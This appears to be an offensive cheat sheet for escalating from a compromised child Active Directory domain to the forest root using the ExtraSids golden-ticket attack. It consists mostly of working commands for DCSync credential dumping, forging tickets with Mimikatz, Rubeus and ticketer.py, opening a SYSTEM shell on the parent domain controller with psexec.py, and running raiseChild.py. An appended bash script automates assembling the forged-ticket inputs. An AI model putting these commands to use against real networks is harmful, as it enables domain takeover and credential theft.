Child -> Parent Trusts

Windows

ExtraSids Attack - Mimikatz

To perform this attack after compromising a child domain, we need the following:

  • The KRBTGT hash for the child domain

  • The SID for the child domain

  • The name of a target user in the child domain (does not need to exist!)

  • The FQDN of the child domain

  • The SID of the Enterprise Admins group of the root domain (the root domain's SID followed by the well-known RID 519)

With this data collected, the attack can be performed with Mimikatz. It works because SID filtering is not enabled by default on trusts within a forest: the forged ticket carries the Enterprise Admins SID in its ExtraSids (SIDHistory) field, and the parent domain's DCs honor it.

# Obtaining the KRBTGT account's NT hash with a DCSync (the output also includes the krbtgt object SID;
# the child domain SID is that SID without its trailing -502 RID). CHILD is the child domain's NetBIOS name.
mimikatz # lsadump::dcsync /user:CHILD\krbtgt

# alternative to get SID using PowerView
Get-DomainSID

# Obtaining Enterprise Admins Group's SID using Get-DomainGroup from PowerView
Get-DomainGroup -Domain DOMAIN.LOCAL -Identity "Enterprise Admins" | select distinguishedname,objectsid

# Or using the ActiveDirectory module cmdlet (requires RSAT); the SID is in the returned SID property
Get-ADGroup -Identity "Enterprise Admins" -Server "DOMAIN.LOCAL"

# Creating a Golden Ticket with Mimikatz: /sid is the child domain SID, /krbtgt is the child krbtgt NT hash,
# /sids is the root domain's Enterprise Admins SID (RID 519) injected as ExtraSids, /ptt loads the ticket into the current session
mimikatz # kerberos::golden /user:hacker /domain:CHILD.DOMAIN.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /krbtgt:9d765b482771505cbe97411065964d5f /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /ptt

# Checking that the Golden Ticket for the non-existent user hacker is loaded in memory
klist

ExtraSids Attack - Rubeus

# Creating a Golden Ticket using Rubeus (/rc4 is the child krbtgt NT hash; the other parameters match the Mimikatz command above)
.\Rubeus.exe golden /rc4:9d765b482771505cbe97411065964d5f /domain:CHILD.DOMAIN.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /user:hacker /ptt

Linux

# Performing a DCSync with secretsdump.py to get the child krbtgt NT hash (adm is a child Domain Admin, or any account with replication rights)
secretsdump.py child.domain.local/adm@ip -just-dc-user child/krbtgt

# Enumerating the child domain with lookupsid.py (SID brute forcing): the first line of output is the domain SID,
# and every object's SID is DOMAIN_SID-RID
lookupsid.py child.domain.local/adm@ip

# Getting the root domain's SID: run lookupsid.py against the parent DC, since Enterprise Admins (RID 519) only exists in the forest root
lookupsid.py child.domain.local/adm@parent_dc_ip | grep -B12 "Enterprise Admins"

# Constructing a Golden Ticket using ticketer.py (same values as the Mimikatz command above); the ticket is written to hacker.ccache
ticketer.py -nthash 9d765b482771505cbe97411065964d5f -domain CHILD.DOMAIN.LOCAL -domain-sid S-1-5-21-2806153819-209893948-922872689 -extra-sid S-1-5-21-3842939050-3880317879-2865463114-519 hacker

# Setting the KRB5CCNAME Environment Variable
export KRB5CCNAME=hacker.ccache

# Getting a SYSTEM shell on the parent DC using Impacket's psexec.py; the DC hostname must resolve (DNS or /etc/hosts)
# because Kerberos needs it for the service ticket, while -target-ip is used for the actual connection
psexec.py CHILD.DOMAIN.LOCAL/hacker@dc01.domain.local -k -no-pass -target-ip ip

Or

# Automating all of the above with raiseChild.py: with a child Domain Admin's credentials it DCSyncs the child krbtgt,
# forges the ticket with the Enterprise Admins SID, dumps the forest root's credentials and, with -target-exec, opens a PsExec session on the given host
raiseChild.py -target-exec ip CHILD.DOMAIN.LOCAL/adm
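The Linux steps above hand values from one tool to the next by hand. The following is an added example, not part of the original page or of Impacket: a bash script that pulls the krbtgt NT hash out of secretsdump.py's text output, the domain SIDs and the Enterprise Admins RID out of lookupsid.py's output, builds the extra SID as DOMAIN_SID-RID, checks that it belongs to the parent domain rather than the child, and prints the matching ticketer.py command. The tool output it parses is constructed sample text (the hash and SIDs are the placeholder values used elsewhere on this page); in a real run you would capture the real output with `tee` and pass it to the same functions.

```bash
#!/usr/bin/env bash
# Added example (not from the original page): derive the ticketer.py inputs from
# secretsdump.py / lookupsid.py output instead of copying them by hand.
set -euo pipefail

# Constructed sample line in secretsdump.py's "domain\user:rid:lmhash:nthash:::" format.
SECRETSDUMP_OUT='CHILD.DOMAIN.LOCAL\krbtgt:502:aad3b435b51404eeaad3b435b51404ee:9d765b482771505cbe97411065964d5f:::'

# Constructed sample lookupsid.py output for the child DC and for the parent DC.
LOOKUPSID_CHILD_OUT='[*] Domain SID is: S-1-5-21-2806153819-209893948-922872689
500: CHILD\Administrator (SidTypeUser)
502: CHILD\krbtgt (SidTypeUser)
512: CHILD\Domain Admins (SidTypeGroup)'

LOOKUPSID_PARENT_OUT='[*] Domain SID is: S-1-5-21-3842939050-3880317879-2865463114
500: DOMAIN\Administrator (SidTypeUser)
512: DOMAIN\Domain Admins (SidTypeGroup)
519: DOMAIN\Enterprise Admins (SidTypeGroup)'

# krbtgt NT hash: 4th colon-separated field of the line whose account name ends in "krbtgt".
krbtgt_nthash() {
  printf '%s\n' "$1" | awk -F: '$1 ~ /krbtgt$/ { print $4 }'
}

# Domain SID from the "[*] Domain SID is: S-1-5-21-..." line.
domain_sid() {
  printf '%s\n' "$1" | sed -n 's/^\[\*\] Domain SID is: \(S-1-5-21-[0-9-]*\)$/\1/p'
}

# RID of a named object, e.g. rid_of "$out" "Enterprise Admins" -> 519
rid_of() {
  printf '%s\n' "$1" | grep -F "\\$2 (" | cut -d: -f1
}

# An object's SID is simply DOMAIN_SID-RID.
object_sid() {
  printf '%s-%s\n' "$1" "$2"
}

# The extra SID must be the *parent* domain's SID + 519. Enterprise Admins only
# exists in the forest root, so a child-domain SID with RID 519 names nothing.
check_extra_sid() {  # $1 = child domain SID, $2 = extra SID
  case "$2" in
    "$1"-*) echo "extra SID was built from the child domain SID, not the parent's" >&2; return 1 ;;
    *-519)  return 0 ;;
    *)      echo "extra SID RID is not 519 (Enterprise Admins)" >&2; return 1 ;;
  esac
}

# Assemble the ticketer.py command line shown in the procedure above.
ticketer_cmd() {  # $1 = nthash, $2 = child FQDN, $3 = child domain SID, $4 = extra SID, $5 = user
  printf 'ticketer.py -nthash %s -domain %s -domain-sid %s -extra-sid %s %s\n' "$1" "$2" "$3" "$4" "$5"
}

main() {
  local nthash child_sid parent_sid ea_rid ea_sid
  nthash=$(krbtgt_nthash "$SECRETSDUMP_OUT")
  child_sid=$(domain_sid "$LOOKUPSID_CHILD_OUT")
  parent_sid=$(domain_sid "$LOOKUPSID_PARENT_OUT")
  ea_rid=$(rid_of "$LOOKUPSID_PARENT_OUT" "Enterprise Admins")
  ea_sid=$(object_sid "$parent_sid" "$ea_rid")
  check_extra_sid "$child_sid" "$ea_sid"
  ticketer_cmd "$nthash" CHILD.DOMAIN.LOCAL "$child_sid" "$ea_sid" hacker
}

main "$@"
```

The only non-obvious step is `check_extra_sid`: the most common mistake in this attack is passing the child's own SID with -519 appended, which produces a ticket that the parent DC accepts as a normal child user with no extra privileges. Parsing both lookupsid.py runs and comparing the prefixes catches that before the ticket is forged.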
